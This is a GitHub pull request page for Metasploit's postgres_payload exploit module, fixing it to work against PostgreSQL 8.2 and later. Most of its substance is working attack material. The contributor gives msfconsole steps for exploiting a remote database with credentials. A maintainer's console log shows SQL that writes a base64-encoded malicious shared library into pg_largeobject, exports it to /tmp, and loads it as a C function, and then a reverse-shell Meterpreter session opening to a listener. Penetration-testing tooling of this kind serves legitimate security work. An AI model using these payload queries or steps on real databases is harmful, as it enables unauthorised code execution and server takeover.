Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Postgres 8.2+ update to postgres_payload.rb module #11794

Merged
merged 1 commit into from May 23, 2019

Conversation

Projects
None yet
5 participants
@arntsonl
Copy link
Contributor

commented Apr 29, 2019

The following update to the postgres_payload.rb module allows the
exploit to work on Postgres 8.2+ databases. Previously, the exploit
would fail due to a missing PG_MODULE_MAGIC_DATA struct
at the top of the imported library.

Verification

  • Run a Postgres database 8.2+ on a remote IP (9.4 was used to verify during this pull request.)
  • Start msfconsole
  • use exploit/linux/postgres/postgres_payload
  • set RHOST <remote Postgres IP>
  • set USERNAME <username>
  • set PASSWORD <password>
  • set DATABASE <database> and ensure the database exists on the Postgres server
  • set TARGET 0 for x86 and set TARGET 1 for x64
  • Use any valid Metasploit payload. Meterpreter was used in my own verification.
  • run
  • Payload will successfully execute. Meterpreter shell will connect back the same as the module worked before.

@bcoles bcoles added the module label Apr 29, 2019

@jmartin-r7

This comment has been minimized.

Copy link
Contributor

commented Apr 29, 2019

@msjenkins-r7 test this please.

@wvu-r7 wvu-r7 self-assigned this May 23, 2019

@wvu-r7 wvu-r7 added the bug label May 23, 2019

@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented May 23, 2019

msf5 exploit(linux/postgres/postgres_payload) > run

[*] Started reverse TCP handler on 192.168.1.2:4444
[*] Trying postgres:postgres@127.0.0.1:5433/template1
[*] 127.0.0.1:5433 Postgres - querying with 'select version()'
[*] 127.0.0.1:5433 - PostgreSQL 10.7 (Debian 10.7-1.pgdg90+1) on x86_64-pc-linux-gnu, compiled by gcc (Debian 6.3.0-18+deb9u1) 6.3.0 20170516, 64-bit
[*] 127.0.0.1:5433 Postgres - querying with 'select lo_creat(-1)'
[*] 127.0.0.1:5433 Postgres - querying with 'delete from pg_largeobject where loid=16388'
[*] 127.0.0.1:5433 Postgres - querying with 'insert into pg_largeobject (loid,pageno,data) values(16388, 0, decode('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', 'base64'))'
[*] 127.0.0.1:5433 Postgres - querying with 'insert into pg_largeobject (loid,pageno,data) values(16388, 1, decode('sAMAAAAAAACwAwAAAAAAAFoAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAAQgAAAAEAAAADAAAAAAAAABAUAAAAAAAAEAQAAAAAAACCAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAIAAAAAAAAAAEAAAAGAAAAAwAAAAAAAACgFAAAAAAAAKAEAAAAAAAAAAEAAAAAAAACAAAAAAAAABAAAAAAAAAAEAAAAAAAAABIAAAADgAAAAMAAAAAAAAAoBUAAAAAAACgBQAAAAAAAAgAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAAVAAAAAEAAAADAAAAAAAAAKgVAAAAAAAAqAUAAAAAAABIAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAIAAAAAAAAAF0AAAADAAAAAAAAAAAAAAAAAAAAAAAAAHAJAAAAAAAAZwAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAAAAALmR5bmFtaWMALnJvZGF0YQAuZHluc3RyAC5oYXNoAC5yZWxhLnBsdAAucmVsYS5keW4ALmR5bnN5bQAudGV4dAAuZGF0YQAuaW5pdF9hcnJheQAuZ290LnBsdAAuc2hzdHJ0YWIA', 'base64'))'
[*] 127.0.0.1:5433 Postgres - querying with 'select lo_export(16388, '/tmp/HcDAZGeW.so')'
[*] Uploaded as /tmp/HcDAZGeW.so, should be cleaned up automatically
[*] 127.0.0.1:5433 Postgres - querying with 'create or replace function pg_temp.YnBFcXDGNq() returns void as '/tmp/HcDAZGeW.so','YnBFcXDGNq' language c strict immutable'
[*] 127.0.0.1:5433 Postgres - Disconnected
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3021284 bytes) to 192.168.1.2
[*] Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.2:56011) at 2019-05-23 18:26:51 -0500

meterpreter > getuid
Server username: uid=999, gid=999, euid=999, egid=999
meterpreter > sysinfo
Computer     : 172.18.0.2
OS           : Debian 9.8 (Linux 4.9.125-linuxkit)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

@wvu-r7 wvu-r7 merged commit f200c12 into rapid7:master May 23, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

wvu-r7 added a commit that referenced this pull request May 23, 2019

@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented May 23, 2019

Release Notes

This fixes a missing struct in the C code for exploits/linux/postgres/postgres_payload, allowing the module to work against Postgres 8.2+.

@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented May 23, 2019

Thanks! Worked against the following target, too:

[*] 127.0.0.1:5433 - PostgreSQL 10.7 (Debian 10.7-1.pgdg90+1) on x86_64-pc-linux-gnu, compiled by gcc (Debian 6.3.0-18+deb9u1) 6.3.0 20170516, 64-bit

msjenkins-r7 added a commit that referenced this pull request May 24, 2019

@gdavidson-r7 gdavidson-r7 added the rn-fix label May 29, 2019

@arntsonl arntsonl deleted the arntsonl:postgres82_update branch Jun 4, 2019

@arntsonl

This comment has been minimized.

Copy link
Contributor Author

commented Jun 4, 2019

Thanks! Worked against the following target, too:

[*] 127.0.0.1:5433 - PostgreSQL 10.7 (Debian 10.7-1.pgdg90+1) on x86_64-pc-linux-gnu, compiled by gcc (Debian 6.3.0-18+deb9u1) 6.3.0 20170516, 64-bit

Fantastic! Glad I could contribute.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.